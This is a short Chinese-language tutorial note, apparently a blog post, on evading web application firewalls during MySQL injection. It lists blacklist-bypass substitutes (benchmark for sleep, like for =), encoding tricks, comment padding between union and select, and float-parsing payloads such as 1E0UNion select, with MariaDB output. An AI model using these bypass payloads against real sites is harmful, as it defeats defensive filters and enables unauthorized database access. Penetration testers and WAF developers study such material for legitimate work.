绕WAF

参考:
https://mp.weixin.qq.com/s/Qn-zh7SwG9wA3dGEz_AEqA
绕各类WAF是渗透测试人员的一项基本技能。WAF分为

  • 云WAF(如 加速乐)
  • 硬件WAF(如 绿盟WAF)
  • 软件WAF(如 安全狗)
  • 代码级WAF

mysql注入

关键字替换。

如在mysql中,WAF将sleep()函数加入黑名单,可以用具备相似功能的benchmark()函数实现绕过。部分相似功能的替代函数:

< > 等价于 BETWEEN

= 等价于 like

hex() bin() 等价于ascii()

sleep() 等价于 benchmark()

mid() substring() 等价于 substr()

@@user 等价于 User()

@@Version 等价于 version()

(mysql支持&&  || ,oracle不支持 && ||)

特殊符号

结合不同数据库的特性差别来实现绕过(最好是可以找到WAF开发者都不了解的某些特性)
比如“`”放在mysql的末尾会起到注释符的作用。

编码

可以结合各种编码方式,比如url编码,url双重,多重编码,hex编码,unicode编码,数据库编码等。

注释符

/blahblah/是注释,也可以充当空白符。因为//可以使得mysql对sql语句union/**/select词法解析成功。其实许多WAF也考虑到了//可以作为空白分割,但是WAF检测/\*.*\*/很消耗性能,工程师会折中,可能在检测中间引入一些特殊字符,例如:/*\w+*/。或者,WAF可能只检查n个字符/\*.{,n}\*/。可逐步测试长度来绕过:

方法:先测试最基本的union/**/select再测试中间引入的特殊字,最后测试注释长度:

union/*aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa*/select

浮点数词法解析

利用mysql解析浮点数的特点,正则表达式无法匹配出单词union,

MariaDB [ultrax]> select email from pre_ucenter_members where uid=1E0UNion select @@version;
+--------------------------+
| email                    |
+--------------------------+
| [email protected] |
| 10.1.23-MariaDB-9+deb9u1 |
+--------------------------+
2 rows in set (0.00 sec)
MariaDB [ultrax]> select email from pre_ucenter_members where uid=1.0UNion select @@version;
+--------------------------+
| email                    |
+--------------------------+
| [email protected] |
| 10.1.23-MariaDB-9+deb9u1 |
+--------------------------+
2 rows in set (0.00 sec)

//TODO

你可能感兴趣的:(安全)